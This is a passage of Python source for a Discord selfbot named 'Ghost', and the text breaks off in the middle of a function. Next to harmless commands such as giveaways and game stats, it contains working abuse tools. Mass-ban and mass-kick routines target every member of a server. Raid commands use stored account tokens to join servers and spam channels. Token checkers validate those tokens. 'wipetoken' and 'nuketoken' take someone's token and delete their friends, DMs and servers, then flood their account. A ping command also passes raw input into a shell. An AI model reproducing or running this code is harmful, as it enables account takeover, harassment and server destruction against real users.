@Ghost.command(name="watchdogstats", description="Get stats about Hypixel's Anticheat, Watchdog", usage="watchdogstats", aliases=["hypixelstats", "banstats", "acstats"])
async def watchdogstats(ctx):
if CONFIG["api_keys"]["hypixel"] == "":
if __embedmode__:
embed = discord.Embed(description="This command requires a hypixel API key.", color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed)
else:
await ctx.send("This command requires a tenor API key.")
else:
data = requests.get(f"https://api.hypixel.net/punishmentstats?key={CONFIG['api_keys']['hypixel']}").json()
if __embedmode__:
embed = discord.Embed(title=f"Watchdog Stats", color=__embedcolour__)
embed.add_field(name="Total Bans", value="```" + str(data["watchdog_total"]) + "```", inline=True)
embed.add_field(name="Last Minute", value="```" + str(data["watchdog_lastMinute"]) + "```", inline=True)
embed.add_field(name="Daily Bans", value="```" + str(data["watchdog_rollingDaily"]) + "```", inline=True)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Watchdog Stats ]
Total Bans: {data['watchdog_total']}
Last Minute: {data['watchdog_lastMinute']}
Daily Bans: {data['watchdog_rollingDaily']}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="skin", description="Gets a MC user skin", usage="skin [MC user]", aliases=["minecaftskin", "mcskin"])
async def skin(ctx, arg):
image = requests.get(f"https://minotar.net/skin/{arg}")
imageFile = open("image.png", "wb").write(image.content)
file = discord.File("image.png", filename="image.png")
if __embedmode__:
embed = discord.Embed(color=__embedcolour__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
embed.set_image(url="attachment://image.png")
await ctx.send(file=file, embed=embed)
else:
await ctx.send(file=file)
os.remove("image.png")
@Ghost.command(name="ppin", description="Add a message to your personal pins.", usage="ppin [message id]", aliases=["personalpin", "addppin", "addpersonalpin"])
async def ppin(ctx, msgId: int):
message = await get_message(ctx, msgId)
data = json.load(open("data/personal-pins.json"))
data[msgId] = {}
data[msgId]["content"] = message.content
data[msgId]["author"] = f"{message.author.name}#{message.author.discriminator}"
json.dump(data, open("data/personal-pins.json", 'w'), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Pinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**📌 Personal Pin**\nPinned message `{message.content}` by `{message.author.name}#{message.author.discriminator}`.")
@Ghost.command(name="ppins", description="List all your pinned messages.", usage="ppins", aliases=["personalpins", "listppins", "ppinlist"])
async def ppins(ctx):
data = json.load(open("data/personal-pins.json"))
ppinsMsg = ""
for value in data:
content = data[value]["content"]
author = data[value]["author"]
ppinsMsg += f"\n__{value}__ :\n** **- Content : `{content}`\n** **- Author : `{author}`"
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=ppinsMsg)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**Personal Pins**\n{ppinsMsg}")
@Ghost.command(name="ppindel", description="Delete a pin from your personal pins.", usage="ppindel [pin id]", aliases=["ppindelete", "removeppin", "deleteppin", "personalpindelete", "deletepersonalpin", "removepersonalpin"])
async def ppindel(ctx, pinId: str):
data = json.load(open("data/personal-pins.json"))
del data[pinId]
json.dump(data, open("data/personal-pins.json", 'w'), sort_keys=False, indent=4)
if __embedmode__:
embed = discord.Embed(title=f"Personal Pin", color=__embedcolour__, description=f"Delete pin `{pinId}`.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"**Personal Pin**\nDelete pin `{pinId}`.")
@Ghost.command(name="countdown", description="Count down from a number.", usage="countdown [number]")
async def countdown(ctx, number: int):
for count in range(number, 0, -1):
await ctx.send(count)
@Ghost.command(name="countup", description="Count up from a number.", usage="countup [number]")
async def countup(ctx, number: int):
for count in range(number):
await ctx.send(count)
@Ghost.command(name="massban", description="Ban all the members in the command server.", usage="massban")
async def massban(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.ban()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="masskick", description="Kick all the members in the command server.", usage="masskick")
async def masskick(ctx):
if __riskmode__:
try:
await ctx.message.delete()
except:
pass
bot = discum.Client(token=__token__, log=False, user_agent=get_random_user_agent())
def close_after_fetching(resp, guild_id):
if bot.gateway.finishedMemberFetching(guild_id):
print_info("Fetching complete.")
members = bot.gateway.session.guild(guild_id).members
bot.gateway.removeCommand({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.close()
print_info(f"Fetched a total of {len(members)} members.")
return members
def get_members(guild_id, channel_id):
print_info("Fetching members...")
bot.gateway.fetchMembers(guild_id, channel_id, keep="all", wait=1)
bot.gateway.command({'function': close_after_fetching, 'params': {'guild_id': guild_id}})
bot.gateway.run()
bot.gateway.resetSession()
return bot.gateway.session.guild(guild_id).members
members = get_members(str(ctx.guild.id), str(ctx.channel.id))
for member in members:
try:
member = await ctx.guild.fetch_member(int(member))
await member.kick()
await asyncio.sleep(1)
except:
pass
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="raidjoin", description="Make all your account tokens join a server.", usage="raidjoin [delay] [invite]")
async def raidjoin(ctx, delay:int = 3, *, invite: str):
if __riskmode__:
print_info(f"Trying to join server with tokens every {delay} seconds.")
for Token in open("data/tokens.txt", "r").readlines():
Token = Token.replace("\n", "")
userAgent = get_random_user_agent()
request = requests.post(f"https://discord.com/api/v9/invites/{invite}", headers={
"Authorization": Token,
"accept": "*/*",
"accept-language": "en-US",
"connection": "keep-alive",
"cookie": f"__cfduid={os.urandom(43).hex()}; __dcfduid={os.urandom(32).hex()}; locale=en-US",
"DNT": "1",
"origin": "https://discord.com",
"sec-fetch-dest": "empty",
"sec-fetch-mode": "cors",
"sec-fetch-site": "same-origin",
"referer": "https://discord.com/channels/@me",
"TE":"Trailers ",
"User-Agent": userAgent,
"X-Super-Properties": "eyJvcyI6IldpbmRvd3MiLCJicm93c2VyIjoiRGlzY29yZCBDbGllbnQiLCJyZWxlYXNlX2NoYW5uZWwiOiJzdGFibGUiLCJjbGllbnRfdmVyc2lvbiI6IjEuMC45MDAxIiwib3NfdmVyc2lvbiI6IjEwLjAuMTkwNDIiLCJvc19hcmNoIjoieDY0Iiwic3lzdGVtX2xvY2FsZSI6ImVuLVVTIiwiY2xpZW50X2J1aWxkX251bWJlciI6ODMwNDAsImNsaWVudF9ldmVudF9zb3VyY2UiOm51bGx9"
})
if request.status_code == 200:
print_info(f"Joined successfully.")
else:
print_info("Failed to join.")
try:
print_info("Accepted guild rules.")
requests.put(f"https://discord.com/api/guilds/{request['guild']['id']}/requests/@me", headers={"Authorization": Token, "User-Agent": userAgent, "Content-Type": "application/json"}, data=json.dumps({}))
except:
print_info("Couldnt accept guild rules")
await asyncio.sleep(delay)
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="tokenraid", description="Raid a server with all your account tokens.", usage="tokenraid [threads] [amount] [channel id] (message)")
async def tokenraid(ctx, threadsAmount:int, amount: int, channel_id: int = None, *, text = None):
if __riskmode__:
await ctx.message.delete()
tokens = []
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
def raid():
def sendMessages():
message = text
print_info("Started new thread.")
for _ in range(amount):
requests.post(f"https://discord.com/api/channels/{channel_id}/messages", headers={"Authorization": random.choice(tokens), "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"content": message + f" [{random.randint(1000, 9999)}]"
}))
print_info("Raid has begun.")
threads = []
for _ in range(threadsAmount):
thread = threading.Thread(target=sendMessages())
threads.append(thread)
threads[_].start()
for thread in threads:
thread.join()
print_info("Raid finished.")
Ghost.loop.create_task(raid())
else:
if __embedmode__:
embed = discord.Embed(title=f"Abusive Commands", color=__embedcolour__, description=f"You have risk mode disabled, you cant use this command.")
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await ctx.send(embed=embed, delete_after=__deletetimeout__)
else:
await ctx.send(f"""```ini
[ Abuse Commands ]
You have risk mode disabled, you cant use this command.
# {__embedfooter__}```""", delete_after=__deletetimeout__)
@Ghost.command(name="checktoken", description="Checks if a token is working.", usage="checktoken [token]", aliases=["tokencheck"])
async def checktoken(ctx, *, token):
tokens = [token]
valid = "invalid"
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking the token you gave...")
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
valid = "invalid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
valid = "valid"
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info(f"Check complete, the token is {valid}.")
@Ghost.command(name="checktokens", description="Checks if your tokens are working.", usage="checktokens")
async def checktokens(ctx):
tokens = []
validTokens = []
invalidTokens = []
message = await ctx.send("Starting check, read console for more information.")
print_info("Checking your tokens has started.")
for token in open("data/tokens.txt", "r").readlines():
tokens.append(token.replace("\n", ""))
for token in tokens:
request = requests.get("https://discord.com/api/users/@me/library", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
if request.status_code != 200:
invalidTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cRed}[INVALID] {fg.cWhite}{token}")
else:
validTokens.append(token)
print(f"{printSpaces}{fg.cGrey}[{getCurrentTime()}] {fg.cGreen}[VALID] {fg.cWhite}{token}")
open("data/valid-tokens.txt", "w").write('\n'.join(validTokens))
open("data/invalid-tokens.txt", "w").write('\n'.join(invalidTokens))
await message.edit(content="Check complete, read console for more information.", delete_after=__deletetimeout__)
print_info("Check complete.")
print_info(f"Valid tokens: {len(validTokens)} (Saved to data/valid-tokens.txt)")
print_info(f"Invalid tokens: {len(invalidTokens)} (Saved to data/invalid-tokens.txt)")
@Ghost.command(name="wipetoken", description="Completely wipe a token.", aliases=["cleantoken"])
async def wipetoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
@Ghost.command(name="nuketoken", description="Nuke a token.", usage="nuketoken [token]", aliases=["tokennuke"])
async def nuketoken(ctx, token):
try:
await ctx.message.delete()
except:
pass
await ctx.send("Check console for more info...", delete_after=__deletetimeout__)
def themeSpammer():
themes = ["dark", "light"]
for i in range(999999999):
requests.patch("https://discord.com/api/users/@me/settings", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"theme": random.choice(themes)
}))
def closeDms():
try:
dms = requests.get("https://discord.com/api/users/@me/channels", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for dm in dms:
try:
requests.delete(f"https://discord.com/api/channels/{dm['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def leaveServers():
try:
guilds = requests.get("https://discord.com/api/users/@me/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for guild in guilds:
try:
requests.delete(f"https://discord.com/api/guilds/{guild['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def removeFriends():
try:
friends = requests.get("https://discord.com/api/users/@me/relationships", headers={"Authorization": token, "User-Agent": get_random_user_agent()}).json()
for friend in friends:
try:
requests.delete(f"https://discord.com/api/users/@me/relationships/{friend['id']}", headers={"Authorization": token, "User-Agent": get_random_user_agent()})
except:
pass
except:
pass
def createGuilds():
while True:
requests.post("https://discord.com/api/guilds", headers={"Authorization": token, "User-Agent": get_random_user_agent(), "Content-Type": "application/json"}, data=json.dumps({
"name": "EPIC GAMERS"
}))
threading.Thread(target=themeSpammer).start()
threading.Thread(target=closeDms).start()
threading.Thread(target=leaveServers).start()
threading.Thread(target=removeFriends).start()
threading.Thread(target=createGuilds).start()
@Ghost.command(name="gstart", description="Start a giveaway in the same channel", usage="gstart [duration] [winners] [prize]", aliases=["giveawaystart", "startgiveaway"])
async def gstart(ctx, duration=None, winners: int = None, *, prize=None):
if duration is not None:
if winners is not None:
if prize is not None:
if duration.endswith("m"):
duration = duration[:-1]
time = int(duration) * 60
timemins = time // 60
timepretty = f"{timemins} minute(s)"
elif duration.endswith("s"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
elif duration.endswith("h"):
duration = duration[:-1]
time = int(duration) * 3600
timehrs = time // 3600
timepretty = f"{timehrs} hour(s)"
else:
if duration.endswith("s") or duration.endswith("m") or duration.endswith("h"):
duration = duration[:-1]
time = int(duration)
timepretty = f"{time} second(s)"
e = discord.Embed(
description=f"React with 🎉 to enter!\nEnds in {timepretty}\nHosted by {ctx.author.mention}",
color=__embedcolour__)
if winners >= 2:
e.set_footer(text=f"{winners} winners | Ends at")
else:
e.set_footer(text="1 winner | Ends at")
e.set_author(name=prize)
future = datetime.now() + timedelta(seconds=time)
e.timestamp = future
msg = await ctx.send("🎉 **GIVEAWAY** 🎉", embed=e)
await msg.add_reaction('\U0001F389')
await asyncio.sleep(time)
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == msg.id:
msg = message
#running = False
if "🎉 **GIVEAWAY** 🎉" in msg.content:
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{Ghost.user.id}>")
nowinner = False
if entries != []:
nowinner = False
winnerslist = []
if winners >= 2:
for _ in range(winners):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
#running = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}",
color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=prize)
if winners >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text="1 winner | Ended at")
future = datetime.now() + timedelta(seconds=time)
newe.timestamp = future
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
#elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
else:
await ctx.send(
f"❌ **Incorrect Syntax**\nTry: `{Ghost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{Ghost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
else:
await ctx.send(f"❌ **Incorrect Syntax**\nTry: `{Ghost.command_prefix}gstart 30m 1 Awesome T-Shirt`")
@Ghost.command(name="gend", description="End a giveaway", usage="gend [message id]", aliases=["giveawayend", "endgiveaway"])
async def gend(ctx, id: int = None):
#running = False
msgId = ""
msgAuthorId = ""
msgContent = ""
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
#print(channelMsgHistory)
for message in channelMsgHistory:
#print(message.id)
if message.id == id:
msgId = message.id
msgAuthorId = message.author.id
msgContent = message.content
msg = message
#print("Fetched Message ID: " + str(msgId))
#print("Looking for Message ID: " + str(id))
#print("Message author ID: " + str(msgAuthorId))
#print("Bot user ID: " + str(Ghost.user.id))
if msgId == id and msgAuthorId == Ghost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msgContent:
#running = True
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{Ghost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ends at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ends at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
newe = discord.Embed(
description=f"A winner was not determined.\nHosted by {ctx.author.mention}", color=0x36393F)
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
newe = discord.Embed(
description=', '.join(winnerslist) + f" won!\nHosted by {ctx.author.mention}",
color=0x36393F)
newe.set_author(name=embed_dict['author']['name'])
if int(winners) >= 2:
newe.set_footer(text=f"{winners} winners | Ended at")
else:
newe.set_footer(text=f"{winners} winner | Ended at")
newe.timestamp = datetime.now()
await msg.edit(content="🎉 **GIVEAWAY ENDED** 🎉", embed=newe)
elif "🎉 **GIVEAWAY ENDED** 🎉" in msgContent:
#running = False
await ctx.send("😔 That giveaway has already ended.")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
@Ghost.command(name="greroll", description="Re-roll a giveaway", usage="greroll [message id]", aliases=["giveawayreroll", "rerollgiveaway"])
async def greroll(ctx, id: int = None):
#running = False
channelMsgHistory = await ctx.channel.history(limit=500).flatten()
for message in channelMsgHistory:
if message.id == id:
msg = message
if msg.author.id == Ghost.user.id:
if "🎉 **GIVEAWAY** 🎉" in msg.content:
#running = True
await ctx.send("You can't re-roll a running giveaway.")
elif "🎉 **GIVEAWAY ENDED** 🎉" in msg.content:
#running = False
embeds = msg.embeds
for embed in embeds:
embed_dict = embed.to_dict()
entries = []
reactions = msg.reactions
for reaction in reactions:
users = await reaction.users().flatten()
for user in users:
entries.append(f"<@{user.id}>")
entries.remove(f"<@{Ghost.user.id}>")
nowinner = False
if "winners" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winners | Ended at", "")
elif "winner" in embed_dict['footer']['text']:
winners = embed_dict['footer']['text'].replace(" winner | Ended at", "")
prize = embed_dict['author']['name']
if entries != []:
nowinner = False
winnerslist = []
if int(winners) >= 2:
for _ in range(int(winners)):
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
winner1 = random.choice(entries)
winnerslist.append(winner1)
else:
nowinner = True
if nowinner is True:
await ctx.send(f"A winner was not determined.\n{msg.jump_url}")
else:
await ctx.send("🎉 " + ', '.join(winnerslist) + f" you won **{prize}**\n{msg.jump_url}")
else:
await ctx.send("That is not a giveaway.")
else:
await ctx.send("That is not a giveaway.")
typing = False
@Ghost.command(name="typing", description="Start or stop typing.", usage="typing [start/stop]", aliases=["inftyping", "infintetyping"])
async def typing__(ctx, action = None):
global typing
if action == "start" or action == "Start":
await ctx.send("Started typing.")
typing = True
while typing is True:
async with ctx.typing():
await asyncio.sleep(1)
if typing is False:
break
elif action == "stop" or action == "Stop":
await ctx.send("Stopped typing.")
typing = False
elif action is None:
pass
@Ghost.command(name="sounds", description="Toggle Ghost notification sounds.", usage="sounds", aliases=["togglesounds", "soundstoggle"])
async def sounds(ctx):
cfg = Config.getConfig()
if cfg["sounds"]:
cfg["sounds"] = False
else:
cfg["sounds"] = True
Config.saveConfig(cfg)
await ctx.send(f"Sounds set to `{cfg['sounds']}`.")
@Ghost.command(name="notifications", description="Toggle Ghost notifications.", usage="notifications", aliases=["togglenotifications", "notificationstoggle", "togglenotifs"])
async def notifications(ctx):
cfg = Config.getConfig()
if cfg["toastnotifications"]:
cfg["toastnotifications"] = False
else:
cfg["toastnotifications"] = True
Config.saveConfig(cfg)
await ctx.send(f"Notifications set to `{cfg['toastnotifications']}`.")
@Ghost.command(name="ping", description="Ping a domain or ip address.", usage="ping [ip/domain]")
async def ping(ctx, *, dns):
message = await ctx.send("Pinging...")
output = subprocess.run(f"ping {dns}",text=True,stdout=subprocess.PIPE).stdout.splitlines()
values = "".join(output[-1:])[4:].split(", ")
minimum = values[0][len("Minimum = "):]
maximum = values[1][len("Maximum = "):]
average = values[2][len("Average = "):]
address = output[1].replace(f"Pinging {dns} [", "").replace("] with 32 bytes of data:", "")
if __embedmode__:
embed = discord.Embed(title=f"{dns} ping..", color=__embedcolour__)
embed.add_field(name="IP Address", value=f"```{address}```", inline=False)
embed.add_field(name="Minimum", value=f"```{minimum}```", inline=False)
embed.add_field(name="Maximum", value=f"```{maximum}```", inline=False)
embed.add_field(name="Average", value=f"```{average}```", inline=False)
embed.set_thumbnail(url=__embedimage__)
embed.set_footer(text=__embedfooter__, icon_url=__embedfooterimage__)
embed.timestamp = datetime.now()
await message.edit(content="Pong!", embed=embed, delete_after=__deletetimeout__)
else:
await message.edit(content=f"""```ini
[ {dns} ping.. ]
IP Address: {address}
Minimum: {minimum}
Maximum: {maximum}
Average: {average}
# {__embedfooter__}
```""", delete_after=__deletetimeout__)
@Ghost.command(name="cloneserver", description="Clone a server.", usage="cloneserver", aliases=["copyserver"])
async def cloneserver(ctx):
serverName = ctx.guild.name
serverIcon = ctx.guild.icon
newGuild = await Ghost.create_guild(serverName)
print_info(f"Created new guild.")
newGuildDefaultChannels = await newGuild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in ctx.guild.channels:
if str(channel.type).lower() == "category":
try:
await newGuild.create_category(channel.name, overwrites=channel.overwrites, position=channel.position)
print_info(f"Created new category : {channel.name}")
except:
pass
for channel in ctx.guild.voice_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_voice_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new voice channel : {channel.name}")
except:
pass
for channel in ctx.guild.stage_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_stage_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new stage channel : {channel.name}")
except:
pass
for channel in ctx.guild.text_channels:
try:
cat = ""
for category in newGuild.categories:
if channel.category.name == category.name:
cat = category
await newGuild.create_text_channel(channel.name, category=cat, overwrites=channel.overwrites, topic=channel.topic, slowmode_delay=channel.slowmode_delay, nsfw=channel.nsfw, position=channel.position)
print_info(f"Created new text channel : {channel.name}")
except:
pass
for role in ctx.guild.roles[::-1]:
if role.name != "@everyone":
try:
await newGuild.create_role(name=role.name, color=role.color, permissions=role.permissions, hoist=role.hoist, mentionable=role.mentionable)
print_info(f"Created new role : {role.name}")
except:
pass
await ctx.send(f"Made a clone of `{ctx.guild.name}`.")
@Ghost.command(name="webhooksetup", description="Create a new server with webhooks.", usage="webhooksetup", aliases=["setupwebhooks"])
async def webhooksetup(ctx):
global __nitrowebhook__, __privnotewebhook__, __giveawaywebhook__, __ghostpingwebhook__, __friendsupdatewebhook__, __dmtypingwebhook__, __guildleavewebhook__, __selfbotwebhook__, __ticketswebhook__
iconFile = open("data/icon.png", "rb")
icon = bytes(iconFile.read())
configFile = json.load(open("config.json"))
guild = await Ghost.create_guild("Ghost Notifications", icon=icon)
newGuildDefaultChannels = await guild.fetch_channels()
for channel in newGuildDefaultChannels:
await channel.delete()
for channel in guild.text_channels:
await channel.delete()
for channel in guild.voice_channels:
await channel.delete()
for channel in guild.categories:
await channel.delete()
category = await guild.create_category_channel("Webhooks")
nitroWebhookChannel = await category.create_text_channel("nitro-sniper")
privnoteWebhookChannel = await category.create_text_channel("privnote-sniper")
giveawayWebhookChannel = await category.create_text_channel("giveaway-sniper")
ghostPingWebhookChannel = await category.create_text_channel("ghost-pings")
friendUpdatesWebhookChannel = await category.create_text_channel("friend-updates")
dmTypingWebhookChannel = await category.create_text_channel("dm-typing")
guildLeaveWebhookChannel = await category.create_text_channel("guild-leave")
selfbotsWebhookChannel = await category.create_text_channel("selfbots")
ticketsWebhookChannel = await category.create_text_channel("tickets")
nitroWebhook = await nitroWebhookChannel.create_webhook(name="Ghost Nitro Sniper")
privnoteWebhook = await privnoteWebhookChannel.create_webhook(name="Ghost Privnote Sniper")
giveawayWebhook = await giveawayWebhookChannel.create_webhook(name="Ghost Giveaway Sniper")
ghostPingWebhook = await ghostPingWebhookChannel.create_webhook(name="Ghost Pings")
friendUpdatesWebhook = await friendUpdatesWebhookChannel.create_webhook(name="Friend Updates")
dmTypingWebhook = await dmTypingWebhookChannel.create_webhook(name="DM Typing")
guildLeaveWebhook = await guildLeaveWebhookChannel.create_webhook(name="Guild Leave")
selfbotsWebhook = await selfbotsWebhookChannel.create_webhook(name="Selfbots")
ticketsWebhook = await ticketsWebhookChannel.create_webhook(name="Tickets")
__nitrowebhook__ = nitroWebhook.url
__privnotewebhook__ = privnoteWebhook.url
__giveawaywebhook__ = giveawayWebhook.url
__ghostpingwebhook__ = ghostPingWebhook.url
__friendsupdatewebhook__ = friendUpdatesWebhook.url
__dmtypingwebhook__ = dmTypingWebhook.url
__guildleavewebhook__ = guildLeaveWebhook.url
__selfbotwebhook__ = selfbotsWebhook.url
__ticketswebhook__ = ticketsWebhook.url
configFile["webhooks"]["nitro"] = __nitrowebhook__
configFile["webhooks"]["privnote"] = __privnotewebhook__
configFile["webhooks"]["giveaway"] = __giveawaywebhook__
configFile["webhooks"]["ghostping"] = __ghostpingwebhook__
configFile["webhooks"]["friendsupdate"] = __friendsupdatewebhook__
configFile["webhooks"]["dmtyping"] = __dmtypingwebhook__
configFile["webhooks"]["guildleave"] = __guildleavewebhook__
configFile["webhooks"]["selfbot"] = __selfbotwebhook__
configFile["webhooks"]["tickets"] = __ticketswebhook__
json.dump(configFile, open("config.json", "w"), sort_keys=False, indent=4)
if __embedmode__:
